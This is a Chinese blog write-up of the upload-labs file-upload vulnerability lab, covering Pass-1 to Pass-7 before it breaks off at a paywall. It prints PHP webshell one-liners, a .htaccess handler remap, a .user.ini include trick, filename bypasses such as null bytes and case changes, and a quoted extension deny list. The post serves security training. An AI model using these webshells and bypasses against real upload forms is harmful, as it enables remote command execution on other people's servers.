upload-labs 全21关 write-up

已于 2022-03-06 18:09:05 修改
阅读量4k 收藏 8
点赞数 3
分类专栏: 漏洞 文章标签: php 文件上传 渗透测试
于 2022-03-06 18:08:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wang_624/article/details/123314313
版权

upload-labs

从经典靶场入手,看文件上传发展经历

下载

upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。

下载地址:https://github.com/c0ny1/upload-labs/releases

在 win 环境下 直接解压到phpstudy下即可

绕过方式

从以下练习中提炼出文件上传的绕过方式

  1. 上传文件类型不收限制

  2. 前端Javascript校验 - Burp抓包改包绕过

  3. 利用缺陷的文件上传验证

    1. 文件类型验证缺陷 - 通过不常见的后缀绕过 比如:php3,php5等等
    2. 上传目录限制文件类型 - 尝试利用目录遍历将文件上传到其他目录
    3. 后缀限制 - 通过.htaccess 欺骗服务器扩展任意自定义文件后缀到已知的MIME类型;利用.user.ini 包含jpg文件到任意已存在php文件中
    4. 黑名单限制 - 利用后端解析差异
      1. ., 空格::$DATA
      2. Apache 解析漏洞,Nginx解析漏洞,IIS解析漏洞
      3. 对上传 . / 进行二次编码,适合验证文件名扩展没有解码,服务端被解码
      4. 利用 ;,%00绕过PHP,Java 高级语言编写,服务器使用 C/C++低级函数处理文件差异

  4. 黑名单过滤后缀 - 通过双写绕过

  5. 文件内容检查 - 通过添加允许文件头格式绕过

  6. 通过条件竞争实现文件上传

练习

靶场练习主要针对后端检查绕过,从黑白名单,后端检查的内容和代码逻辑几个方面提出不同的绕过方式

有些绕过方式较为久远,我就简单介绍,其他可以在现阶段使用的上传手法给予较多的关注

Pass-1 Javascript 前端检查

一般 都是通过 JS 限制上传的文件类型,对于这种情况,我们可以采用以下几种方式绕过

  • 修改JS文件
  • 上传png后缀的webshell,代理抓包,修改上传的文件后缀 (推荐)
  • 禁用js

靶场实战

  1. 上传webshell.png 文件内容为:<?php @system($_GET['cmd']); ?>
  2. burp 抓包 ,修改文件名为ceshi.php
  3. 成功上传后,找到上传图片的位置,访问 GET /xxx/ceshi.php?cmd=whoami

burp 修改上传文件名的位置

获取到图片位置,通过GET方式传入 cmd 参数来获取执行系统命令

Pass-2 文件类型检查有缺陷

对文件类型检查有缺陷-检查Content-Type标头是否与MIME 类型匹配。

绕过方式:

  1. 上传 webshell.php 内容为:<?php @system($_GET['cmd']); ?>
  2. 抓包 修改上传的Content-Type 类型为允许的类型 image/jpeg
  3. 放包,收到成功上传
  4. 复制文件上传的路径,请求 GET /upload/upload/webshell.php?cmd=whoami

Pass-3 黑名单限制不完全

对于黑名单限制上传文件后缀的 可以通过以下几种方式绕过

  1. 通过使用可被执行但不常见的后缀名,比如 php5,shtml等等
  2. 上传恶意的配置文件(Apache .htaccess) 欺骗服务器将任意自定义文件扩展名映射到可知执行的MIME类型
  3. 利用后端解析差异绕过限制
    1. 添加尾随字符,一些组件会去除或忽略尾随空格、点等:exploit.php. /exploit.php+空格
    2. 对点,斜杠 使用URL 编码, 如果验证文件扩展名时没有解码,在服务端被解码,绕过黑名单限制, exploit%2Ephp
    3. 在文件扩展名前添加分号或 URL 编码的空字节字符。如果验证是用 PHP 或 Java 等高级语言编写的,但服务器使用 C/C++ 中的低级函数处理文件,例如,这可能会导致文件名结尾出现差异:exploit.asp;.jpg或exploit.asp%00.jpg

靶机实战

  1. 上传 webshell.php3 内容为:<?php @system($_GET['cmd']); ?>
  2. 复制文件上传的路径,请求 GET /upload/upload/20200304.php5?cmd=whoami

Pass-4 .htaccess 扩展后缀名

测试上传的后缀, php1 php2 php3 都不行,后缀被限制了,尝试上传 .htaccess 添加扩展后缀

  1. 上传 .htaccess 内容为:AddType application/x-httpd-php .l33t

  2. 上传 webshell.l33t 内容为:<?php @system($_GET['cmd']); ?>

  3. 访问文件,执行webshell

Pass-5 .user.ini

本关在上传目录下存在readme.php的php文件,可以利用 .user.ini 文件 使得运行 readme.php 时 包含上传的图片,相当于readme.php也有webshell.php。

user.ini

auto_prepend_file=web.jpg

web.jpg

<?php @eval($_GET['cmd']) ?>

Pass-6 大小写绕过

 $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);

服务器端检查后缀时忽略了对大小写的检测,故可以通过大写后缀绕过

Pass-7 黑名单限制不完全- 空格

    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5"," 
        .......
        ,".ini");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);
最低0.47元/天 解锁文章
0zzie
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
前端判断上传的文件是否为同一个文件_文件上传漏洞uploadlabs靶场16
weixin_39959126的博客
12-16 1109
文件上传漏洞upload-labs靶场文件上传靶场环境:https://github.com/c0ny1/upload-labsLess1 前端JS绕过0x01 Less1说明查看源代码function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file =...
upload-labs(15-21)
weixin_43825758的博客
04-17 757
123
【Web安upload-labs靶场环境配置以及writeup(结合靶场源码分析)
鹤子的一些知识共享
04-22 711
本文旨在让读者通过upload-labs靶场熟悉文件上传漏洞原理,本文结合靶场代码分析了漏洞成因及其绕过与防御
upload-labs(writeup)
leekos的博客,分享web安全相关知识~
12-25 863
upload-labs(WriteUp)
upload-labs 文件上传靶场 writeup
st0ut的博客
06-05 1955
文件上传靶场练习 前言 文件上传漏洞是一个高危漏洞,想要复习一下,二刷一下文件上传靶场 Pass-01 提示: 本pass在客户端使用js对不合法图片进行检查! 通过提示发现是在客户端用js进行验证的,js验证实在发送到服务器端之前而验证的,那么我们就可以在此之前做点手脚。 可以先上传一个合法的文件,通过抓包来进行修改参数,就可以绕过这个限制了。 Pass-02 提示 本pass在服务端对数据...
upload-labs-master靶机闯总结
Alexz__的博客
10-14 2258
此靶机上传的都是此一句马文件 <?php class test {function assert(){$f = __FUNCTION__ ;@$f($_POST['shell']);}}$t = new test();$t->assert(); ?> 部分少有的曲线(救国)木马会在相应的pass里面贴出来 <?php 直奔主题 ?> p...
UPLOAD-lab 1-19
感恩
10-08 338
UPLOAD-LABS
安装upload-labs
10-22
同时,upload-labs还提供了详细的课程讲解和write up(通关指南),可以帮助您更好地理解和掌握文件上传漏洞的防御方法。 结语 安装upload-labs是一个非常重要的步骤,它可以帮助您快速掌握文件上传漏洞的基础知识...
WEB渗透学习-upload-labs靶场
04-20
"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21卡,从基础到高级,帮助新手逐步提升对这类漏洞的理解和应对能力。 ### 一、文件上传漏洞概述 文件上传漏洞通常发生在Web应用程序中...
上传文件漏洞靶场upload-labs
09-27
总的来说,`upload-labs`靶场提供了一个理想的环境,让你在安的环境中实践和掌握上传文件漏洞相的知识,这对于提升你的Web安技能至重要。通过深入研究和实践,你将能够更好地保护自己和他人的网站免受此类...
upload-labs19-20以及总结1
08-08
在本卡中,我们面对的是一个Web应用程序的文件上传功能。从题目描述和源码分析,我们可以看到存在几个键的防御措施,但同时也存在明显的漏洞。首先,我们需要理解文件上传的基本流程及其潜在的安风险。...
upload-labs-master.zip
06-22
【描述】描述中的 "文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master" 显示这是一个针对文件上传漏洞的系列练习,通过多次嵌套的目录结构,可能旨在模拟不同...
upload-labs靶场详解
人若有志,就不会在半坡停止。
11-07 1750
1.定义:是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。本质为Apache配置⽂件,提供 了针对⽬录改变配置的⽅法,在⼀个特定的⽂档⽬录中放置⼀个包含⼀个或多个指 令的⽂件,2.允许.htaccess⽂件使⽤,httpd.conf配置⽂件中AllowOverride参数设置为All。3.参数:type 表示可以被分多个子类的独立类别,subtype 表示细分后的每个类型。以作⽤于此⽬录及其所有⼦⽬录,管理相⽬录下的⽹⻚配置。
谜团靶机writeup - 专项 · 文件上传
小龙人
01-09 785
涵盖极广的常见且实用的文件上传漏洞利用技巧,收集了渗透测试和CTF中遇到的各种上传漏洞,涵盖文件上传的所有基本的利用技巧,旨在帮助大家对上传漏洞有一个面的了解。 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个面的了解。 谜团靶机平台地址:https://mituan.zone/ 注册选择靶机 注册登录之后可以看到有很多靶机,选择本次的目标-文件上传。 遇到不符合常理的问题可以点清空上传文件试试。 图片马 gif格.
upload-labs了解upload那点事(21版本原理精细记录)
五分之一世纪
08-22 3166
文章目录<1>最简单的是前端<2>content-type很简单<3>文件后缀能改变<4>配置文件也不难<5>文件大写第六<6>空格与点七八<7>冒号data传文件<8>双写绕过十一<9>文件后缀零零断<10>注意文件头检验<11>两个函数来判断<12>二次渲染不一般<13>条件竞争难不难?<14>数组绕过难不难?<15>都
推荐开源项目:Upload Labs Writeup - 分析与实战平台
gitblog_00085的博客
03-29 272
推荐开源项目:Upload Labs Writeup - 分析与实战平台 upload-labs-writeup项目地址:https://gitcode.com/gh_mirrors/up/upload-labs-writeup 本文将向您介绍一个出色的开源项目——,这是一个专为安研究人员和渗透测试者设计的在线报告编写和分享平台。它的主要功能是帮助用户方便地创建、管理和分享他们的实验报告、漏洞...
upload_labs靶机21超详细通关
HEAVEN569的博客
02-16 973
文件上传漏洞 upload_labs靶机练习 前言: 这是我练习文件上传漏洞时候,顺手整理下来的练习报告,本人小白一个从基础漏洞开始学习,有什么错误欢迎指出,勿喷。 因为不同地方下载的upload_labs靶机不一样,所以我这下面的卡顺序可能和你的不一样。 靶机地址:本机搭建的phpstudy http://127.0.0.1/upload/Pass-01/index.php 测试浏览器:火狐(firefox) 测试平台靶机:upload_labs Pass-01 1......
Upload-labs 1-21 靶场通关
weixin_45653478的博客
03-14 921
漏洞描述:利用前端 JS 对上传文件后缀进行校验,后端没进行检测利用方法:(1)浏览器禁用 js(2)burp 抓包 先上传白名单文件,再用 burp 修改上传文件后缀在游览器上打开图像地址。
37_DC-5靶机渗透测试、nmap使用、kail漏洞库使用、系统提权、反弹shell到kali、留后门、蚁剑连接webshell、文件包含漏洞利用、NC用法
最新发布
weixin_54591045的博客
08-15 605
知识点:web的、Linux、系统命令、Python kail漏洞库使用、系统提权、反弹shell到kali、留后门、蚁剑连接webshell、文件包含漏洞利用
upload-labs21通关
08-17
通关 upload-labs 的第 21 ,你需要按照以下步骤进行: 1. 阅读卡说明:在开始之前,仔细阅读第 21 卡说明,了解该卡的漏洞场景和要求。 2. 分析页面结构:打开第 21 的页面,仔细分析页面的结构和功能。观察是否存在文件上传的功能或漏洞。 3. 尝试上传文件:如果页面有文件上传功能,尝试上传不同类型的文件,观察系统的反馈信息。注意观察是否有文件类型检***反馈信息,尝试使用一些常见的绕过技巧来绕过文件上传限制。例如,修改文件后缀名、使用特殊字符、绕过文件类型检测等。 5. 尝试恶意文件:在成功绕过限制后,尝试上传一个恶意文件。可以使用一些常见的 webshell 或木马文件进行测试。 6. 获取漏洞利用结果:上传成功后,观察系统的反馈信息,尝试获取上传文件的路径或访问地址。 7. 提交答案:将获取到的漏洞利用结果提交到 upload-labs 网站上第 21 的答案验证页面。如果结果正确,你将解锁下一个卡。 请记住,在学习和挑战过程中要遵循合法合规的原则,不要用于非法用途。如果你遇到困难,可以参考一些文件上传漏洞的学习资料或向安社区寻求帮助。祝你成功通关
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值